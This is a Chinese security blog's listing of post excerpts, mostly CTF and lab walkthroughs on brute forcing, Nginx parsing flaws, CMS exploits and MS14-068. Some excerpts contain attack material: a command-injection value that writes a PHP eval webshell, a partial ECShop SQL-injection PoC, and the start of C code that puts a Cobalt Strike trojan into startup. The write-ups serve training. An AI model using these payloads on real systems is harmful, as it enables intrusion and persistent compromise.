- 博客(43)
- 资源 (1)
- 收藏
- 关注
原创 JAVA高级-1
*任何版本的java中,接口都能定义抽象方法格式:public abstract 返回值类型 方法名称(参数列表);注意事项:1、接口当中的抽象方法,修饰符必须是两个固定的关键字:public abstract2、上面两个关键字修饰符可以选择性省略3、方法的三要素可以随意定义*/// 这是一个抽象方法/*接口当中也可以定义“成员变量”,但是必须使用public static final三个关键字进行修饰。
2023-12-03 16:42:32 996
原创 java基础
/定义学生类 public class functionstudent {//成员变量 String name;int age;//成员方法 public void eat() {System . out . println("吃饭");System . out . println("睡觉");System . out . println("学习");} }
2023-07-27 11:25:22 278
原创 MS14-068(域提权)漏洞复现
这里便用到了我们之前所讲到的 PAC 这个东西,PAC 是用来验证 Client 的访问权限的,它会被TGT 里发送给 Client,然后由 Client 发送给 TGS。但也恰恰是这个 PAC 造成了 MS14-068 这个漏洞。该漏洞是位于 kdcsvc.dll 域控制器的密钥分发中心(KDC)服务中的 Windows 漏洞,它允许经过身份验证的用户在其获得的票证 TGT 中插入任意的 PAC。普通用户可以通过呈现具有改变了 PAC 的 TGT 来伪造票据获得管理员权限。
2023-06-29 17:12:37 769
原创 LAMP环境搭建
主要介绍LAMP环境的安装(文末有软件包光盘,可直接下载实践!博主是彩笔,有任何问题或优化建议可以私信或者留言。大家一起进步!vm虚拟机centos 7。
2023-03-14 08:47:35 75
原创 安鸾渗透实战平台(CTF训练题) bash (150分)
安鸾渗透实战平台公网vpsxshell(也可以用windows自带的cmd)能连接就行。
2023-02-08 16:58:02 344
原创 安鸾渗透实战平台(中间件) Apache Tomcat AJP 文件包含漏洞(CVE-2020-1938 ) (150分)
安鸾渗透实战平台公网vps。
2023-02-08 14:55:22 802
原创 nginx文件解析漏洞
当我们访问 http://IP地址/a.jpg/.php时,该URL是可以匹配上面的正则表达式 .php$,但是在php-cgi解析时会提取真正的文件名http://IP地址/a.jpg,并对其解析。这样就成功的执行了jpg文件中的php代码。中的cgi.fix_pathinfo=1改为0(在不影响业务的情况下)找个图片,写个phpinfo()到里面。正常的配置是把这一段注释掉的。修复意见就是把这一段注释掉。或者将# php.ini。nginx的配置文件。
2022-10-10 23:20:19 1329
原创 xss-labs-master靶场环境搭建与1-6关解题思路
1、靶场地址2、小皮面板3、windows机器4、把压缩包解压,放在www目录下,然后访问即可直接输入就行:使用上面的弹窗语句,发现被转义了拿出函数后,发现双引号已经被注释成发现双引号被转义后,我们尝试使用单引号绕过,但是.........
2022-07-01 00:07:28 730
原创 安鸾渗透实战平台(文件上传)—— Nginx解析漏洞 (100分)
安鸾渗透实战平台图片、一句话木马中国蚁剑(webshell管理工具)冻手1、准备好图片马(截取一个图片,编辑加入一个一句话木马)2、上传3、从回显的文件路径中截取后面字段4、访问(最开始显示买豆子的图片,我还以为图片没了=.=)5、url后面加上/.php(在的,在的)6、上蚁剑7、找flag1、升级nginx2、修改/etc/php.ini文件,将cgi.fix_pathinfo的值设为0:...
2022-06-28 12:49:40 1937 1
原创 安鸾渗透实战平台(CMS系列)—— ecshop (200分)
漏洞环境安鸾渗透实战平台python 3中国蚁剑(webshell管理工具)题目情况分析1、访问网页,最下面也有版本信息泄露2、信息收集3、找到一个公用POC,用python执行的#!/usr/bin/python# -*- coding: utf-8 -*-import requestsimport timea="554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:280:\"*/ union select 1,0x
2022-04-29 12:53:44 2894 2
原创 安鸾渗透实战平台(CMS系列)—— Discuz (150分)
漏洞环境安鸾渗透实战平台火狐代理插件(foxyproxy)burp suitepro(抓包工具)中国蚁剑(webshell管理工具)题目情况分析1、访问网页,右下角有CMS版本名称和版本号2、使用搜索引擎去查看历史漏洞3、挑选一个进行测试用一个远程代码执行的:1.Discuz国际版漏洞存在于cookie的language可控并且没有严格过滤,导致可以远程代码执行。2.产生原因:Discuz!ML 系统对cookie中的l接收的language参数内容未过滤,导致字符串拼接,从
2022-04-29 12:30:19 2010
原创 用C语言将 cobalt strike的木马,写入启动项
用C语言将 cobalt strike的木马,写入启动项这是一项小测试,他并不能绕过杀软(写入启动项的时候杀软会拦截)也不能正确的回连,在使用“powershell”回连的时候杀软也会拦截。这只是本地测试,请勿用于非法用途,如果发生法律问题,与作者无关!#define _CRT_SECURE_NO_WARNINGS#include <windows.h>#include <stdio.h>#include<string.h>#pragma commen
2022-04-17 14:54:42 605
原创 安鸾渗透实战平台(基础)—— 指纹识别 (50分)
漏洞环境安鸾渗透实战平台kali (自带whatweb)题目解题kali自带whatweb,不要用什么御剑,不符合题意,他让你用什么是有用意的whatweb -u http://47.100.220.113:8009/
2022-04-08 14:35:11 2147
原创 安鸾渗透实战平台(基础)——目录扫描 (100分)
漏洞环境安鸾渗透实战平台kali (自带dirsearch)windows (解压网站备份包)题目下载字典,直接跑dirsearch -u http://47.100.220.113:8008/ -w /root/桌面/dicc.txt -e php -t 1 -m HEAD-u:跟url-w:跟网站目录字典-e:扩展搜索,这里搜索php-t:指定线程-m:指定 请求方式HEAD:一种http请求方式(跟get和post类似),不同的是他只返回请求的响应码,不返回响应的数据内
2022-04-08 14:23:11 2635
原创 安鸾渗透实战平台(基础)——Linux基础命令 (100分)
漏洞环境安鸾渗透实战平台windows机器一台(用作ssh登录)题目:使用windows的命令行登录看看情况ssh test@47.100.220.113 -p2233ssh:ssh协议test:用户名47.100.220.113:ip-p:指定端口找文件用ls查看一下啥也没有用ls -all 找到隐藏文件linux中文件前面带.的为隐藏文件我们用cat查看一下获得上卷(九阴真经打钱!)用cd跳到根目录下寻找,提示权限不够cd…cd…find -name
2022-04-08 13:32:38 3261
原创 安鸾渗透实战平台——SSH离线破解 (250分)
漏洞环境安鸾渗透实战平台kali(john):linux密码攻击工具详情了解请转到这位师傅的博客:https://www.fujieace.com/kali-linux/courses/john.html题目打开压缩包会得到两个文件字典文件shadow:1、Linux操作系统下有一个文件负责所有用户的密码。那就是shadow;2、/etc/shadow文件中的记录行与/etc/passwd中的一一对应,它由pwconv命令根据/etc/passwd中的数据自动产生。分析shadow文件
2022-03-09 01:46:02 4846
原创 安鸾渗透实战平台—— wordpress后台破解 (400分)
漏洞环境安鸾渗透实战平台kali(wpscan)题目信息下载密码文件到kali直接调用wpscanwpscan --url http://118.190.133.35:8090 / -e u -P /home/kali/Desktop/dict.txt程序会自动识别出用户名,并爆破密码成功登录...
2022-03-09 00:52:46 5961
原创 安鸾渗透实战平台——一句话密码破解 (250分)
漏洞环境安鸾渗透实战平台kali虚拟机题目信息这里只给了IP,不知道一句话木马的位置,直接上工具跑他的网站目录dirsearch -u 118.190.133.35:8089[04:34:35] Starting: [04:34:36] 200 - 763B - /.git/branches/[04:34:36] 301 - 321B - /.git -> http://118.190.133.35:8089/.git/[04:34:36] 200 - 3KB
2022-03-08 22:49:53 4823 3
原创 安鸾渗透实战平台—— 命令执行01 (100分)
环境安鸾渗透实战平台—— 命令执行01 (100分)菜刀题目写入一句话木马backup.tar.gz;echo '<?php @eval($_POST["666"]); ?>' >shell.phpecho:输出<?php @eval($_POST["666"]); ?>:一句话木马的内容>shell.php:写入到当前目录下的shell.php(没有就创建一个)使用菜刀连接...
2022-03-02 20:27:40 1039
原创 安鸾渗透实战平台——暴力破解(Mysql暴力破解 (200分)
漏洞环境安鸾渗透实战平台——暴力破解(Mysql暴力破解)kali虚拟机分析题目1、从图上作者告诉我们要使用MySQL漏洞,最开始没明白是什么意思,去拿MSF的mysql爆破模块去测试了一下,得到密码,拿去使用时出现了问题提示密码错误:又试了几次发现每次爆破的密码都不一样...
2022-03-02 16:32:29 2408
原创 用burp抓夜神APP的数据包
环境1、夜神APP(官方下载)2、burp操作步骤1、先看自己网卡的IP地址,我是wifi网卡,所以看wifi地址window+R:cmdipconfig2、在burp上配置代理端口3、在burp上导出AC证书这里注意,一定要以.cer结尾4、打开夜神app,下拉,找到wifi5、设置代理IP地址,要与burp上配置的一致(也就是wifi的地址)6、导入AC证书把桌面上的AC证书拖入到夜神模拟器设置-安全-从SD卡安装7、叫设置锁屏密码,设就行了8、
2022-02-26 19:22:01 941
原创 安鸾渗透实战平台——暴力破解(telnet服务破解 )
telnet简介:测试连通性,也有用来管理路由交换设备的连通性,如H3C的路由器就可以实现telnet远程管理,只需要输入对应的用户名密码即可。Telnet服务器与Telnet客户端之间需要建立TCP连接,Telnet服务器的缺省端口号为23.实验环境1、安鸾渗透实战平台——暴力破解(telnet服务破解 )2、hydra(kali自带)审题:告诉telnet是:www.whalwl.fun端口是:2323 密码:我猜是admin使用hydra爆破hydra -l admin
2022-01-28 02:30:13 4554
原创 安鸾渗透实战平台——暴力破解(FTP服务破解)
第一题破解ftp利用kali中的hydra爆破hydra -l admin -P top100pass.txt ftp://118.190.133.35 -l:表示用户名自定义-L:表示用户名取字典-p:表示密码自定义-P:表示密码取自字典后面跟服务:ftp用ftp工具登录(这里用的是winscp)...
2022-01-28 01:41:06 4134
原创 安鸾渗透实战平台—— struts2远程命令执行01 (150分)
漏洞环境安鸾渗透实战平台struts2远程命令执行01: http://www.whalwl.cn/challenge?id=74Struts2漏洞检查工具2018版 V2.1漏洞利用1、来到目标网址随便输入密码并点击登录2、获取上面的urlhttp://106.15.50.112:8088/login/login_CheckLogin.action3、打开工具,填写url并选择对应的漏洞版本号4、获得回显并查看flag...
2022-01-27 23:26:50 1955
原创 C语言基础day1~
一个工程中仅有一个main函数1、一个工程中可以有多个.c文件,但是多个.c文件中只允许有一个main函数C语言中的数据类型char //字符型short //短整型int //整形long //长整形long long //更长的整形float //单精度浮点数double //双精度浮点数 int main(){ //字符型 char ch = 'a'; //输出字符串类型使用%s //整形
2021-12-25 17:18:07 432
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人